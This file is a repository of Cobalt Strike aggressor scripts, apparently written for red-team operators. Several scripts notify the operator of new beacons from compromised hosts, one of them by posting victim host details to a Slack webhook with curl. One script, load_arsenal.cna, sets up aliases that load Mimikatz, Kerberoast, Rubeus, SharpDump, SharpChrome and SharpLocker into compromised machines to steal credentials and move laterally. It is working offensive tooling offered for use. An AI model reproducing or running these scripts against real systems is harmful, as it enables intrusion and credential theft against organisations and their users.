├── README.md
├── linux-notify.cna
├── load_arsenal.cna
├── macos-notify.cna
├── slack-notify.cna
└── win-notify.cna


/README.md:
--------------------------------------------------------------------------------
1 | # AggressorScripts
2 | A collection of Cobalt Strike aggressor scripts
3 | 


--------------------------------------------------------------------------------
/linux-notify.cna:
--------------------------------------------------------------------------------
 1 | #### Notify Beacon
 2 | ## Aggressor script to simplify run linux desktop notification when you get a new beacon
 3 | ###  Author: Sabri (@KINGSABRI)
 4 | 
 5 | ### Usage ###
 6 | # - Install libnotify-bin (required)
 7 | #    $ apt install libnotify-bin 
 8 | ### Output ###
 9 | # Get a beacon and you will get desktop notifications
10 | 
11 | on beacon_initial {
12 |   $beacon   = binfo($1);
13 |   $user     = $beacon['user'];
14 |   $host     = $beacon['host'];
15 |   $computer = $beacon['computer'];
16 |   $pid      = $beacon['pid'];
17 |   $title    = "New Beacon! ";# . $user . '@' . $host;
18 |   $message  = '' . $user . '@' . $host . ' (' . $computer . ') | ' . $pid;
19 |   @notify   = @('notify-send','-u', 'critical', '-i', '/opt/cobaltstrike/icon.jpg', $title, $message);
20 |   exec(@notify);
21 | }
22 | 


--------------------------------------------------------------------------------
/load_arsenal.cna:
--------------------------------------------------------------------------------
  1 | #### Load PowerShells
  2 | ## Aggressor script to simplify importing powershell scripts using powershll-import  
  3 | ###  Author: Sabri (@KINGSABRI)
  4 | 
  5 | ### Usage ###
  6 | # 1. Modify/Add your script pathes in global variable section
  7 | # 2. Import into Cobalt Strike
  8 | # 3. From beacon try
  9 | #     beacon> load_powerview
 10 | #     beacon> load_powerup
 11 | #     beacon> load_powerupsql
 12 | #     beacon> whoami
 13 | ### Output ###
 14 | # powershell-import task gets exected
 15 | # execute-assembly tas gets executed
 16 | 
 17 | ### Global variables section
 18 | $powerview_path   = "/rt/p/rt-powershell/PowerView.ps1";
 19 | $powerup_path     = "/rt/p/rt-powershell/PowerUp.ps1";
 20 | $powerupsql_path  = "/rt/p/rt-powershell/PowerUpSQL/PowerUpSQL.ps1";
 21 | $kerberoast_path  = "/rt/p/rt-powershell/Invoke-Kerberoast.ps1";
 22 | $mimikatz_path    = "/rt/p/rt-powershell/Invoke-Mimikatz.ps1";
 23 | $whoami_path      = "/rt/p/rt-compiled/SharpSploit/whoami.exe";
 24 | $rubeus_path      = "/rt/p/rt-compiled/GhostPack/Rubeus.exe";
 25 | $seatbelt_path    = "/rt/p/rt-compiled/GhostPack/Seatbelt.exe";
 26 | $sharpUp_path     = "/rt/p/rt-compiled/GhostPack/SharpUp.exe";
 27 | $sharpWMI_path    = "/rt/p/rt-compiled/GhostPack/SharpWMI.exe";
 28 | $sharpDump_path   = "/rt/p/rt-compiled/GhostPack/SharpDump.exe";
 29 | $sharpChrome_path = "/rt/p/rt-compiled/GhostPac/SharpChrome.exe";
 30 | $sharpLocker_path = "/rt/p/rt-compiled/Misc/SharpLocker.exe";
 31 | ### 
 32 | 
 33 | sub load_ps_script
 34 | {
 35 |     $bid  = $1[0];
 36 |     $file = $1[1];
 37 |     binput($bid, "powershell_import $file");
 38 | 	bpowershell_import($bid, $file);
 39 | }
 40 | 
 41 | sub load_bin_script
 42 | {
 43 |     $bid    = $1[0];
 44 |     $file   = $1[1];
 45 |     $params = join(' ', sublist($1, 3));
 46 |     binput($bid, "execute-assembly $file $params");
 47 | 	bexecute_assembly($bid, $file, $params);
 48 | }
 49 | 
 50 | #
 51 | # PowerShells
 52 | #
 53 | alias load_powerview {
 54 |     @args = @($1, $powerview_path);
 55 | 	load_ps_script(@args);
 56 | }
 57 | 
 58 | alias load_powerup {
 59 |     @args = @($1, $powerup_path);
 60 | 	load_ps_script(@args);
 61 | }
 62 | 
 63 | alias load_powerupsql {
 64 |     @args = @($1, $powerupsql_path);
 65 | 	load_ps_script(@args);
 66 | }
 67 | 
 68 | alias load_kerberoast {
 69 |     @args = @($1, $kerberoast_path);
 70 | 	load_ps_script(@args);
 71 | }
 72 | 
 73 | alias load_mimikatz {
 74 |     @args = @($1, $mimikatz_path);
 75 | 	load_ps_script(@args);
 76 | }
 77 | 
 78 | 
 79 | 
 80 | #
 81 | # Binaries
 82 | #
 83 | alias whoami {
 84 |     @args = @($1, $whoami_path);
 85 | 	load_bin_script(@args);
 86 | }
 87 | 
 88 | alias exec_rubeus {
 89 |     @args = @($1, $rubeus_path, @_);
 90 |     load_bin_script(flatten(@args));
 91 | }
 92 | 
 93 | alias exec_seatbelt {
 94 |     @args = @($1, $seatbelt_path, @_);
 95 |     load_bin_script(@args);
 96 | }
 97 | 
 98 | alias exec_sharpUp {
 99 |     @args = @($1, $sharpUp_path, @_);
100 |     load_bin_script(@args);
101 | }
102 | 
103 | alias exec_sharpWMI {
104 |     @args = @($1, $sharpWMI_path, @_);
105 |     load_bin_script(@args);
106 | }
107 | 
108 | alias exec_sharpDump {
109 |     @args = @($1, $sharpDump_path, @_);
110 |     load_bin_script(@args);
111 | }
112 | 
113 | alias exec_sharpChrome {
114 |     @args = @($1, $sharpChrome_path, @_);
115 |     load_bin_script(@args);
116 | }
117 | 
118 | alias exec_sharpLocker {
119 |     @args = @($1, $sharpLocker_path, @_);
120 |     load_bin_script(@args);
121 | }
122 | 


--------------------------------------------------------------------------------
/macos-notify.cna:
--------------------------------------------------------------------------------
 1 | #### Notify Beacon
 2 | ## Aggressor script to simplify run MacOS desktop notification when you get a new beacon
 3 | ###  Author: Sabri (@KINGSABRI)
 4 | 
 5 | ### Usage ###
 6 | # - the terminal-notifier can be installed by one of the following
 7 | # $gem install terminal-notifier
 8 | # or
 9 | # $brew install terminal-notifier
10 | ### Output ###
11 | # Get a beacon and you will get desktop notifications
12 | 
13 | on beacon_initial {
14 |   $beacon   = binfo($1);
15 |   $user     = $beacon['user'];
16 |   $host     = $beacon['host'];
17 |   $computer = $beacon['computer'];
18 |   $pid      = $beacon['pid'];
19 |   $title    = "New Beacon!";
20 |   $message  = $user . '@' . $host . ' (' . $computer . ') | ' . $pid;
21 |   @notify   = @('/usr/local/bin/terminal-notifier', '-message', $message, '-title', $title);
22 |   exec(@notify);
23 | }
24 | 


--------------------------------------------------------------------------------
/slack-notify.cna:
--------------------------------------------------------------------------------
 1 | #### Load PowerShells
 2 | ## Aggressor script to send slack notification whith basic beacon's info on a new beacon initial call
 3 | ###  Author: Sabri (@KINGSABRI)
 4 | 
 5 | ### Usage ###
 6 | # 1. Edit $teamserver, $slack_webhook, $bot_name and $slack_webhook
 7 | # 2. run it as a headless: ./agscript 127.0.0.1 50050 SlackNotify PASSWORD slack-notify.cna
 8 | ### Output ###
 9 | # Get a beacon and check your slack ;)
10 | 
11 | $teamserver    = "Main C2";
12 | $slack_channel = "#Hell";
13 | $bot_name      = "CS-Bot";
14 | $slack_webhook = "https://hooks.slack.com/services/XXX/YYY/ZZZ";
15 | 
16 | on beacon_initial {
17 |   $beacon   = binfo($1);
18 |   $user     = $beacon['user'];
19 |   $host     = $beacon['host'];
20 |   $computer = $beacon['computer'];
21 |   $pid      = $beacon['pid'];
22 |   $message  = 'payload={"username": "'. $bot_name .'", "channel": "'. $slack_channel .'","attachments": [{"color": "danger","author_name": "' . $teamserver . '", "fallback": "New Beacon ' . $teamserver . ' | ' . $pid . '", "fields": [{"title": "' . $user . '@' . $host . ' (' . $computer . ')","short": false}],"footer": "PID: ' . $pid . '"}]}';
23 |   @curl_command = @('curl','-X','POST','--data-urlencode', $message, $slack_webhook);
24 |   exec(@curl_command);
25 | }
26 | 


--------------------------------------------------------------------------------
/win-notify.cna:
--------------------------------------------------------------------------------
 1 | #### Notify Beacon
 2 | ## Aggressor script to simplify run Windows desktop notification when you get a new beacon
 3 | ###  Author: Sabri (@KINGSABRI)
 4 | 
 5 | ### Usage ###
 6 | # - the powershell is installed on Windows by default
 7 | ### Output ###
 8 | # Get a beacon and you will get desktop notifications
 9 | 
10 | on beacon_initial {
11 |   $beacon   = binfo($1);
12 |   $user     = $beacon['user'];
13 |   $host     = $beacon['host'];
14 |   $computer = $beacon['computer'];
15 |   $pid      = $beacon['pid'];
16 |   $title    = "New Beacon!";
17 |   $message .= '[reflection.assembly]::loadwithpartialname("System.Windows.Forms");[reflection.assembly]::loadwithpartialname("System.Drawing");';
18 |   $message .= '$notify = new-object system.windows.forms.notifyicon;';
19 |   $message .= '$notify.icon = [System.Drawing.SystemIcons]::Information;';
20 |   $message .= '$notify.visible = $true;';
21 |   $message .= '$notify.showballoontip(20,'; 
22 |   $message .= '"' . $title . '"';
23 |   $message .= ','; 
24 |   $message .= '"' . $user . '@' . $host . ' (' . $computer . ') | ' . $pid . '"';
25 |   $message .= ','; 
26 |   $message .= '[system.windows.forms.tooltipicon]::None);';
27 |   $encoded = base64_encode(str_encode($message, "UTF-16LE"));
28 |   @notify   = @('powershell.exe', '-enc', $encoded );
29 |   $exec = exec(@notify);
30 | }
31 | 


--------------------------------------------------------------------------------